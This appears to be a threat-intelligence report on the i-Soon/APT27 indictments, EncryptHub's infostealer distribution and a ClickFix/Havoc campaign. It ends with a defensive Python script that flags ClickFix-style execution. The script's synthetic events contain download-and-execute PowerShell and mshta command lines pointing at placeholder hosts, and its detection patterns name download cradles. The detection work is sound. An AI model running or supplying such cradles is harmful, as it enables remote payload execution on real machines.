Full Report
DoJ indicts i-Soon and APT27 actors, EncryptHub buys pay-per-install services to compromise victims, and ClickFix abuses MS SharePoint to deploy Havoc.
Analysis Summary
# Incident Report: State-Sponsored Hacking and Financially Motivated Malware Campaigns
## Executive Summary
This report synthesizes two distinct threat developments: U.S. indictments of individuals linked to the Chinese state-sponsored group APT27 and the contractor i-Soon for large-scale data theft targeting government entities, and the emergence of the financially motivated group EncryptHub, which uses phishing and pay-per-install (PPI) services to distribute infostealers and is developing its own RAT. The US DoJ action against i-Soon disrupts a state-backed hacking-for-hire ecosystem, while EncryptHub illustrates a growing criminal trend of combining social engineering with third-party distribution brokers for financial gain.
## Incident Details
- Discovery Date: Ongoing; the indictments were announced this week. The specific breaches are historical, with APT27/i-Soon activity dating back to circa 2011.
- Incident Date: Ongoing campaigns; i-Soon activity noted since 2011. EncryptHub emerged in the summer of last year.
- Affected Organization: U.S. federal and state government agencies, foreign ministries across Asia (APT27/i-Soon). High-value commercial entities (EncryptHub).
- Sector: Government/Public Sector; General Enterprise (EncryptHub).
- Geography: Primarily US and Asia targets; operators based in China.
## Timeline of Events
### Initial Access
- **Date/Time:** Ongoing since circa 2011 (for state actors). EncryptHub activity noted since Summer of last year.
- **Vector:**
* **i-Soon/APT27:** Exploitation of vulnerabilities in victim systems (specific CVEs and targeting details are not given in the source).
* **EncryptHub:** Advanced phishing, smishing, vishing, and trojanized software distribution.
- **Details:**
* APT27 actors exploited vulnerabilities and deployed PlugX malware.
* EncryptHub targeted entities using fake IT support sites to steal VPN credentials, and distributed malware via trojanized versions of QQ Talk, WeChat, DingTalk, Google Meet, and Microsoft Visual Studio.
* EncryptHub is leveraging Pay-Per-Install (PPI) services like LabInstalls for bulk distribution.
### Lateral Movement
- **i-Soon/APT27:** Not detailed in the source.
- **EncryptHub:** Focus seems heavily on initial payload deployment (infostealers) potentially leading to remote access via the emergent EncryptRAT.
### Data Exfiltration/Impact
- **i-Soon/APT27:** i-Soon sold stolen data to at least 43 MSS and MPS bureaus across 31 Chinese provinces, charging up to $75,000 per compromised email inbox.
- **EncryptHub:** Deployment of infostealers (Fickle, StealC, Rhadamanthys) leading to data theft. They are developing EncryptRAT for command and control and data access.
### Detection & Response
- **i-Soon/APT27:** The US Department of Justice (DoJ) indicted 10 actors, and i-Soon's domain was seized. The State Department offered a $10M reward for information on i-Soon actors and $2M for APT27-linked actors. OFAC sanctioned APT27-linked actors.
- **EncryptHub:** Observed and tracked by security researchers (e.g., Outpost24). Response focuses on organizational defense layers.
## Attack Methodology
- **Initial Access:** Exploitation of vulnerabilities (APT27); Social engineering, Phishing (SMS/Voice), Trojanized applications (EncryptHub).
- **Persistence:** (Not explicitly detailed for i-Soon, but PlugX deployed). EncryptHub developing EncryptRAT for C2 management.
- **Privilege Escalation:** (Not explicitly detailed).
- **Defense Evasion:** (APT27 used PlugX/ShadowPad). EncryptHub hosts its infrastructure with the bulletproof hosting provider Yalishanda, which resists takedown rather than evading host-level detection.
- **Credential Access:** EncryptHub targets VPN credentials via fake IT support sites.
- **Discovery:** (Implied for state actors).
- **Lateral Movement:** (Not detailed).
- **Collection:** Stolen intellectual property and sensitive data (i-Soon); Infostealer payloads (EncryptHub).
- **Exfiltration:** Stolen inboxes and data delivered to the Chinese bureaus that paid for them (i-Soon). Credentials and files harvested by the infostealers (EncryptHub), with EncryptRAT under development to add remote command and access.
- **Impact:** Compromise of government systems (i-Soon/APT27); Financial gain via data sales (i-Soon); Infostealer deployment and establishing remote access (EncryptHub).
## Impact Assessment
- **Financial:** i-Soon charged significant fees (up to $75k per inbox). EncryptHub is financially motivated. The US government offered rewards totaling $12M USD in connection with the indictments, alongside OFAC sanctions.
- **Data Breach:** Compromise of sensitive government and foreign ministry data (i-Soon). Theft of user credentials and sensitive files via infostealers (EncryptHub).
- **Operational:** Disruption to government continuity (implied). Operational risk for entities falling for EncryptHub scams.
- **Reputational:** Significant diplomatic and security ramifications from state-sponsored indictments.
## Indicators of Compromise
*Note: As this report summarizes indictments and general known TTPs, specific time-bound C2 IPs/domains are not provided.*
- **Network indicators:** C2 traffic over legitimate cloud services such as the Microsoft Graph API (from the ClickFix/Havoc campaign in the headline, not linked to the i-Soon or EncryptHub execution paths). Such traffic blends with normal Microsoft 365 use, so hunt for Graph API calls from unexpected processes rather than for the destination alone.
- **File indicators:** PlugX malware (APT27); Fickle, StealC, Rhadamanthys infostealers (EncryptHub).
- **Behavioral indicators:** Use of PPI services for bulk malware distribution (EncryptHub). In the ClickFix/Havoc campaign, a user-initiated pasted command launches PowerShell, which runs a Python script that deploys the C2 framework.
## Response Actions
- **Containment:** (Not detailed for victims). For i-Soon, the US action involved domain seizure and sanctions.
- **Eradication:** (Unknown efficacy against state actors).
- **Recovery:** (Unknown scope).
## Lessons Learned
- State-sponsored hacking operations are deeply entrenched and structured as for-hire services (i-Soon) designed to monetize stolen data for specific government bureaus.
- Financially motivated groups like EncryptHub are rapidly adopting sophisticated techniques, including buying installs from pay-per-install (PPI) distribution services and developing their own RATs (EncryptRAT).
- Social engineering remains highly effective, combining smishing/vishing with fake IT support lures to capture high-value credentials (VPNs).
## Recommendations
- Enhance software supply chain vetting, in particular around third-party installers and the PPI brokers that abuse them.
- Implement layered defenses, including robust email filtering and endpoint detection that flags suspicious PowerShell and mshta executions launched from interactive parents (the ClickFix pattern), along with Run-dialog history and clipboard activity.
- Continuous employee cybersecurity training specific to social engineering vectors (voice, SMS, and phishing sites mimicking internal IT).
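The behavioral indicators and the endpoint-detection recommendation above both describe the ClickFix execution pattern: a user pastes an attacker-supplied command into the Run dialog or a terminal, and a LOLBin such as PowerShell or mshta is launched by an interactive parent with download-and-execute arguments. The following Python triage routine is an added example, not code from the report or from any of the sources it summarizes. It applies those indicators to constructed events in a Sysmon-like shape (Event ID 1 process creation, Event ID 13 registry value set for the Run dialog's RunMRU history); the field names, paths, SIDs and URLs are assumptions made for the example.

```python
"""Flag ClickFix-style execution from Sysmon-like process and registry events.

Constructed example: the events below are synthetic and loosely modelled on
Sysmon Event ID 1 (process creation) and Event ID 13 (registry value set).
Paths, SIDs and URLs are placeholders, not indicators from the report."""
import re

SAMPLE_EVENTS = [
    # ClickFix: command pasted into the Run dialog, so explorer.exe spawns PowerShell
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -w hidden -c "iwr http://203.0.113.10/s.ps1 | iex"'},
    # ClickFix variant: mshta pulling a remote HTA
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
    # Run-dialog history: Windows stores each submitted command under RunMRU
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a",
     "Details": r"powershell -ep bypass -e SQBFAFgA\1"},
    # Benign: scheduled script launched from cmd.exe, not an interactive parent
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
    # Benign: user opens a text file from Explorer
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad C:\Users\alice\notes.txt"},
]

# Parents that indicate a human typed or pasted the command (Run dialog, Explorer, terminal)
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe"}
# Living-off-the-land binaries ClickFix lures typically invoke
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Command-line traits that turn an interactive LOLBin launch into a finding
SUSPICIOUS = [
    (r"(?i)-(?:w|windowstyle)\s+hidden", "hidden window"),
    (r"(?i)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}", "encoded command"),
    (r"(?i)\b(?:iex|invoke-expression)\b", "Invoke-Expression"),
    (r"(?i)\b(?:iwr|invoke-webrequest|downloadstring|curl|wget)\b", "download cradle"),
    (r"(?i)\bmshta(?:\.exe)?\s+https?://", "mshta remote HTA"),
    (r"(?i)-(?:ep|executionpolicy)\s+bypass", "execution policy bypass"),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def suspicious_reasons(cmdline: str) -> list[str]:
    """Labels of every SUSPICIOUS pattern present in a command line."""
    return [label for pattern, label in SUSPICIOUS if re.search(pattern, cmdline)]


def classify(event: dict) -> tuple[bool, list[str]]:
    """Return (flagged, reasons) for a single event."""
    if event["EventID"] == 1:
        parent, image = basename(event["ParentImage"]), basename(event["Image"])
        reasons = suspicious_reasons(event["CommandLine"])
        if parent in INTERACTIVE_PARENTS and image in LOLBINS and reasons:
            return True, [f"{image} spawned by {parent}"] + reasons
        return False, []
    if event["EventID"] == 13 and "\\Explorer\\RunMRU\\" in event["TargetObject"]:
        # RunMRU values carry a trailing "\1" marker that Windows appends; strip it
        reasons = suspicious_reasons(event["Details"].removesuffix("\\1"))
        if reasons:
            return True, ["Run-dialog history (RunMRU)"] + reasons
    return False, []


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Indices and reasons of all flagged events, in input order."""
    findings = []
    for index, event in enumerate(events):
        flagged, reasons = classify(event)
        if flagged:
            findings.append((index, reasons))
    return findings


if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_EVENTS):
        print(f"event {index}: " + "; ".join(reasons))
```

The parent-process condition is what keeps the false-positive rate tolerable: a download cradle under a scheduler or a management agent is a different investigation, whereas the same cradle under explorer.exe almost always means a person was talked into running it. The RunMRU rule catches the paste even when the process event is missed or the command never produced a child process.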